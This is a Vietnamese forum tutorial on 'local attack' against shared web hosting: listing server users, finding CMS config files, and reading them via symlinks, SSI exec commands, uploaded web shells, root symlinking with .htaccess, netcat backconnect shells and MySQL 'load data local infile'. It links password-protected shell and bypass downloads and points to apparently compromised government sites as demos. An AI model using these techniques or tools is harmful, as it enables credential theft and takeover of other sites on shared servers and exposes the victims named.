4-Crack hoặc change pass admin

5-Login vào quyền quản trị và upshell


1-View danh sách các user trên server


Muốn local được 1 site nào đó trên server thì trướ tiên cần phải xác định site đó có user là gì, có source là gì từ đó tìm cách đọc file config.php của user đó.


-Một số câu lệnh để get user:


Lệnh phổ biến nhất:
Cat /etc/passwd



Tuy nhiên một số server cấm lệnh cat, có thể sử dụng các lệnh sau một cách linh hoạt
Less /etc/passwd

./cat/etc/passwd

More /etc/passwd



Ngoài ra có thể sử dụng chức năng get user trên shell byg.php, c99.php hay bypass ở r57.php, soleil.pin, telnet.pl hoặc các shell sau:


http://www.mediafire.com/?gic70c6ce441333

http://www.mediafire.com/?hi4gnmu3kpxn095 ( đk: chmod 755)

http://www.mediafire.com/?2rk42hiv9b4ii3f


Pass download: soleil_vhb

Pass dải nén: ceh.vn


-Câu lênh get user & domain
Cat /etc/virtual/domainowners



2-Tìm file path file config.php


Đối với các mã nguồn mở thì path file config được mặc định như sau:

Lưu ý: “path” chính là path từ server dẫn tới site, ví dụ đối với server linux, path là: /home/user/public_html
-Vbulletin:

path/includes/config.php

-Mybb:

path/inc/config.php

-Joomla:

path/configuration.php

-Word-Press:

path/wp-config.php

-Ibp:

path/conf_global.php

-Php-fusion:

path/config.php

-Smf:

Path/Settings.php

-Nuke:

path/config.php

-Xoops:

path/mainfile.php

-Zen Cart

Path/includes/configure.php

-path/setidio:

path/datas/config.php

-Datalife Engine:

path/engine/data/config.php

-Phpbb:

Path/config.php

-Wordpress:

path/wp-config.php

-Seditio:

path/datas/config.php

-Drupal:

path/sites/default/settings.php

- Discuz

path/config/config_ucenter.php

- Bo-Blog

path/data/config.php



-Đây là path mặc định đối với các mã nguồn mở, còn đối với site tự code thì thông thường path vẫn đặt hay ngay sau thư mục public_html ( path/config.php) (Cái này chủ yếu do thói quen của người lập trình viên) .


-Đối với các quản trị viên chú ý đến tính năng bảo mật, phòng tránh local attack thì họ thường dấu kỹ và thay đổi path dẫn đến file config, trong trường hợp này cần phải dò path bắt đầu từ file index đi vào. Soleil sẽ lấy ví dụ tìm path file config.php đối với vbulletin chẳng hạn:
Forum.php -> global.php -> includes/class_bootstrap -> includes/init.php -> includes/class_core.php -> includes/config.php



( Để tìm kiếm path trong source, search theo từ khóa: “cwd”, ta sẽ thấy đoạn code tương tự như: “require_once(CWD . '/includes/init.php');” - Đây là path mặc định dẫn tới file init.php))……


3-Get thông tin file config


Phần này chính là phần trọng tâm nhất. Trong phần này soleil sẽ giới thiệu đầy đủ các kỹ thuật cơ bản để local attack.


3.1- Trước hết tìm hiểu qua về các câu lệnh cơ bản trong linux ứng dụng cho local attack:


-Ls , dir : Liệt kê tên các file bên trong thư mục
ls -al, ls -lia: Liệt kê tên và thuộc tính các file bên trong thư mục
Ls -lia /home/vhbgroup/public_html/@4rum/includes.config.php



-Cat, ./cat, less, more, tail : View nôi dung bên trong các file:
Cat /home/vhbgroup/public_html/@4rum/includes/config.php



-Ln : Lệnh symbolic link:
Ln -s /home/vhbgroup/public_html/@4rum/includes/config.php soleil.ini


-Cd: Chuyển đổi thư mục


Ví dụ muốn chuyển tới thư mục soleil”
Cd /home/vhbgroup/public_html/@4rum/includes/soleil

cd ~ : Tới thư mục home dictionary

cd -: Quay lại thư mục vừa làm việc

cd ..: Tới thư mục kề bên ngoài thư mục đang làm việc



-Chmod: Phân quyền cho các file hoặc thư mục:
Chmod 400 config.php ( đang làm việc trong thư mục includes chứa file config.php )



-Mkdir: tạo thư mục:


Ví du muốn tạo thư mục soleil trong thư mục includes:
Mkdir /home/vhbgroup/public_html/@4rum/includes/soleil



-Touch : Tạo file:
touch /home/vhbgroup/public_html/@4rum/includes/soleil.php



-Tar, zip: Lệnh nén và giải nén: thường sử dụng trong symlink root
Tar –zcvf ducdung08clc.tar.gz soleil ( Nén thư mục soleil thành file ducdung08clc.tar.gz)

Tar –zxvf ducdung08clc.tar.gz ( giải nén file ducdung08clc.tar.gz)


Zip –r -9 ducdung08clc.zip soleil ( Nén thư mục soleil thành file ducdung08clc.zip)

Zip -p ducdung08clc.zip ( Giải nén file ducdung.tar.gz)
…………


3.2-Phần tiếp theo Soleil sẽ trình bày 1 số kỹ thuật dùng để lấy thông tin file config.php


1-Sử dụng các lệnh cat, dir để xem tên thư mục, tệp tin và đọc nội dung tệp tin.

Ví dụ:
dir /home/vhbgroup/public_html/includes

cat /home/vhbgroup/public_html/includes/config.php



Nhưng hiện nay phần lớn các server đều không cho phép thực thi những hàm này nên ứng dụng phương pháp này không mấy khả thi

2-Sử dụng Symbolic link – Gọi tắt là symlink


Symbolic link là kỹ thuật cơ bản và gần như là quan trọng mà phần lớn các attaker nghĩ đến đầu tiên trước khi thực hiện công việc local attack.
Ln -s /home/vhbgroup/public_html/@4rum/includes/config.php soleil.ini


Có thể hiểu đơn giản là tạo 1 file soleil.ini trên host có nội dung giống file config.php của user vhbgroup trên server có path/home/vhbgroup/public_html/@4rum/includes/config.php

Có thể thay soleil.ini bằng .txt nhưng do thói quen soleil vẫn hay sử dụng .ini hơn bởi vì đối với 1 số server bị lỗi nó có thể bypass permissions 400.


3-Sử dụng symlink kết hợp với ssi:


Đối với 1 sô server khi symbolick link bình thường xuất hiên 403 forbinden – không cho phép đọc file đã được symlink thì giải pháp được nghĩ đến đó là kết hợp với ssi.

-Tạo 1 file ducdung08clc.shtml với nội dung như sau:
<!--#include virtual="soleil.ini"-->



Trong đó file soleil.ini là file đã được symbolic link trên server.

Bây giờ view source của file ducdung08clc.shtml ta sẽ thấy đc nội dung file soleil.ini đã symbolic link.


4-Chạy lệnh bằng file .shtml


-Tuy nhiên có 1 số server cả 2 cách đó đều không áp dụng được nhưng nó lại cho chạy lệnh bằng file .shtml

<!--#exec cmd="cat /etc/passwd"-->



-Lệnh xem file logs như sau:
<!--#exec cmd="tail -n 10000 /var/log/httpd/domains/vhbgroup.net.error.log"-->



Lưu ý:

+ lệnh tail cũng giống như lệnh cat nhưng nó dùng để xem nhưng dòng cuối cùng của file trên server.

+ /var/log/httpd/domains/vhbgroup.net.error.log là path dẫn đến file error.log của direct admin

+ Còn path dẫn đến file error.log của cpanel là: /usr/local/apache/logs/error_log ….., tùy vào bộ cài host mà path dẫn đến file error.log khác nhau.


5-Get all config toàn server


-Đâu tiên download shell get all config ( w.php) về rồi up lên server.


http://www.mediafire.com/?hi4gnmu3kpxn095 ( pass unlock: soleil_vhb )





This image has been resized.Click to view original image






-Click vào done và thư mục có tên là tmp sẽ được tạo ra.

-Vào link của thư mục tmp sẽ có 1 số shell với các chức năng sau:

+ dz.sa : Đây là shell cgi, sử dụng nó để get các user trên server bằng cách thực thi câu lệnh: cat /etc/passwd, more /etc/passwd ( Pass login là: dz ).

+ user.sa : Shell này dung để xem danh sách các user và domain trên server.

+ config.sa : Shell này có nhiệm vụ thực thi get all config bằng phương pháp symlink




This image has been resized.Click to view original image






-Vào link shell http://www.vksbinhphuoc.gov.vn/soleil/tmp/config.sa


-Coppy toàn bộ thông tin user có được từ câu lệnh: cat /etc/passwd vào khung như hình ảnh dưới đây rồi ấn “get config”




This image has been resized.Click to view original image






-Cuối cùng trở lại link http://vksbinhphuoc.gov.vn/soleil/tmp/ , chúng ta sẽ có được danh sách các file config của các site trên server.




This image has been resized.Click to view original image




* Đặc điểm của con shell get all config này:

+ Là 1 công cụ cực kỳ thuận tiện, giảm bớt thời gian và công sức khi local attack

+ Chỉ sử dụng đối với các server cho chạy shell cgi và cho quyền symlink

+ Không bypass được, chỉ symlink đối với các site chưa chmod và có path dẫn đến file config là mặc định.


6-Symbolink Root:


-Download file r00t.tar.gz về và upload lên host:

http://www.mediafire.com/?21kycoh4g5s4ojo ( pass download: soleil_vhb, pass dải nén: ceh.vn )

-Sau đó giải nén file root.tar.gz, sử dụng lệnh sau:
Tar –zxvf r00t.tar.gz



-Up file .htacess cùng thư mục với file r00t:
Options all

DirectoryIndex Sux.html

AddType text/plain .php

AddHandler server-parsed .php

AddType text/plain .html

AddHandler txt .html

Require None

Satisfy Any



-Nếu không sủ dụng file r00t.tar.gz đó, có thể thực hiện sym root ngay trên shell


Demo:

http://tnmthatinh.gov.vn/soleil/r00t/


Và đây là cấu trúc của trường http://cdhh.edu.vn/ ( sym root)


http://tnmthatinh.gov.vn/soleil/r00t...h/public_html/


7-Backconnet:


Có thể hiểu đơn giản là kết nối bằng cổng sau, nghĩa là sử dụng shell backconnet và tool netcat (nc.exe) để mở sẵn 1 cổng trên server, sau đó từ máy tính của attacker kết nối với server qua cổng đã được mở sẵn đó. Mọi câu lệnh thực thi đối với server có thể thực hiện trên máy tính của attacker qua command line.


Đồ nghề cần thiết:


-Tool netcat (nc.exe)

http://www.mediafire.com/?rs3g94eafjq5qvh


-Shell back connect đối với asp:

http://www.mediafire.com/?etciiuskzvyhjcw


Chú ý, trong shell có 1 đoạn code như: "G:\domains\tvled.vn\wwwroot\austdoor\design\n c.ex e -l -p 1234 -e cmd.exe -d"

Lúc up shell lên cần edit lại “G:\domains\tvled.vn\wwwroot\austdoor\design\” thành path của server dẫn tới file nc.exe.


-Shell backconnet đối với php

http://www.mediafire.com/?8o1sj35cs51lsiw


( Pass unlock soleil_vhb; Pass dải nén: ceh.vn )


-Download tool nc.exe rồi đặt trong ổ C chẳng hạn, sau đó mở cửa sổ command line và sử dụng netcat để mở cổng trên local host kết nối với server đã mở sẵn cổng


-Cú pháp: + chế độ kết nối : nc [-tùy_chọn] tên_máy cổng1[-cổng2]
+ chế độ lắng nghe: nc -l -p cổng [-tùy_chọn] [tên_máy] [cổng]


Một số câu lệnh có thể sử dụng:
nc -nvv -l -p 80

nc -lvvnp 3333

nc -nvv -l -p 12345

nc 127.0.0.1 7777

nc -vv -l -p 7777

nc -vlp 443



+ -l: đặt netcat vào chế độ lắng nghe để chề kết nối đến

+ -n: Chỉ dùng ip ở dang số, ví dụ: 123.30.2.42, netcat sẽ ko xét đến DNS.

+ -p: Chỉ định cổng cần lắng nghe hay kết nối

+ -v: Hiện thi các thông tin về kết nối hiện tại. –vv sẽ hiện thị thông tin chi tiết hơn nữa.


-Lưu ý là cần coppy nc.exe vào 1 vị trí nào trong máy rồi sử dụng command đến thư mục chứa nc.exe trước khi thực hiện các câu lệnh liên quan đến netcat


-Sauk hi đã backconnect thành công thì tiến hành local đơn giản chỉ bằng 1 câu lệnh coppy shell từ site đã up được shell tới site victim.

8-Via SQL

-Login vào database và tạo 1 table để load các thông tin bằng cách sử dụng querry sau

create table soleil ( ducdung08clc varchar (1024));


-Query load các thông tin vào table table vừa được tạo:


load data local infile '/etc/passwd' into table soleil


Có thể thay câu lệnh “/etc/passwd” bằng path dẫn đến file config.


-Query hiện thị các thông tin được load vào table soleil:


select * from soleil


1số lưu ý:


- Đối với 1 số server Safe_mod: ON, thì shel không có chức năng run command để thực thi các câu lệnh, vậy làm sao có thể local được. Giải pháp được nghĩ đến là sử dụng shell cgi:



This image has been resized.Click to view original image






+ Soleil.pin


http://www.mediafire.com/?4k94v1i0shmr46c

Cách sử dụng:

-Up shell soleil.pin và chmod nó về 755

-Up hoặc tạo file .htaccess trong thư mục chứa shell có nội dung:

## START ##

Options +ExecCGI

AddHandler cgi-script cgi pl cgi gmc pin jpg

RewriteEngine on

RewriteRule (.*)\.mil$ $1.cgi

Options +FollowSymLinks

DirectoryIndex cmd.html

Options +Indexes

RemoveHandler .hack

AddType text/plain .hack

## milw0rmvn exploit ##



Hoặc:

Options FollowSymLinks MultiViews Indexes ExecCGI

AddType application/x-httpd-cgi .cin

AddHandler cgi-script .pin

AddHandler cgi-script .pin



+ telnet.pl

http://www.mediafire.com/?t9cavs1n0ipthq1

shell telnet.pl có chức năng hoàn toàn tương tự với con shell soleil.pin. Tuy nhiên cách thức sử dụng nó thì đơn giản hơn nhiều vì không phải sử dụng đến file .htaccess mà chỉ cần chmod nó về 755 là chạy được.





This image has been resized.Click to view original image





( Pass unlock: soleil_vhb, pass dải nén nếu có : ceh.vn )


* Đối với các server không có chức năng run command và cũng không cho chạy shell cgi thì có thể sử dụng các shell sau để bypass đơn giản đối với 1 số server.


+ facesymlink.php

http://www.mediafire.com/?fc9kencnilx0rm4 ( 5.2.12 -> 5.3.1

http://www.mediafire.com/?kmid8rahl5wjh74 ( version 5.3 -> 5.4 )


+ 529bypass.php

http://www.mediafire.com/?cls0e5k873w83ef


+ Bypassnull.php

http://www.mediafire.com/?1x0zxmig5ctwezr


+ Hoặc sử dụng safe mode bypass

http://www.mediafire.com/download.php?38d13jgqw132db2


+ Sử dụng các chức năng bypass trên con shell r57vip này ( nên convert domain sang dạng ip)

http://www.mediafire.com/?sqjs5du3srlifqt


+ Hoặc sử dụng via sqli

v.v….

(Tất cả các shell download trên đều có pass unlock: vhb_soleil và pass dải nén nếu có: ceh.vn)




Trong bài tut trên soleil đã giới các phương pháp local attack cơ bản và các dạng bypass cơ bản nhất có thể sử dụng khi thực hiện Local attack. Trong các bài tiếp theo soleil sẽ đề cập đến các kỹ thuật bypass nâng cao đối với 1 số server khó, các thủ thuật vượt chmod qua 400 permission, chiếm quyền điều khiển root (get root) và các kỹ thuật up shell đối với 1 số mã nguồn mở như: joomla, worpress, nukeviet, vbulletin, drupal ( sau khi đã locgin vào dattabase)……
Nguồn vnw